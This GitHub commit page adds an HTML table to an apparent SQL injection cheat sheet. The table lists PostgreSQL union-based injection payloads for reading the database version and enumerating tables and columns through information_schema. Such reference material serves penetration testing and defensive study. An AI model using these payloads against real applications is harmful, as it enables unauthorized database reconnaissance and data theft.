Skip to content

Commit 0377ce3

Browse files
Add files via upload
1 parent d217b37 commit 0377ce3

1 file changed

Lines changed: 30 additions & 0 deletions

File tree

Lines changed: 30 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
<h3 id="union-based-injection">Union-Based Injection</h3>
2+
3+
<p class="pageDescription">{{site.data.injectionDescriptions.unionBased}}</p>
4+
5+
<table class="table table-striped table-hover">
6+
<thead>
7+
<tr>
8+
<th>Description</th>
9+
<th align="left">Query</th>
10+
</tr>
11+
</thead>
12+
<tbody>
13+
<tr>
14+
<td>Union null<br/><i>Note: If original query returns more than one column, add null to equal the number of columns</i></td>
15+
<td>SELECT "postgres","test" UNION SELECT version(),null<br></td>
16+
</tr>
17+
<tr>
18+
<td>Union to retrieve all table names</td>
19+
<td>SELECT 'postgres' UNION SELECT table_name FROM information_schema.tables--</td>
20+
</tr>
21+
<tr>
22+
<td>Union to retrieve table names that are not pre-built/default</td>
23+
<td>SELECT 'postgres' UNION SELECT table_name FROM information_schema.tables WHERE table_schema NOT IN ('pg_catalog', 'information_schema') AND table_schema NOT LIKE 'pg_toast%' AND table_type = 'BASE TABLE'--</td>
24+
</tr>
25+
<tr>
26+
<td>Union to retrieve columns in a table<br/><i>Note: table name is case-sensitive</i></td>
27+
<td>SELECT 'postgres' UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'TABLE-NAME'--</td>
28+
</tr>
29+
</tbody>
30+
</table>

0 commit comments

Comments
 (0)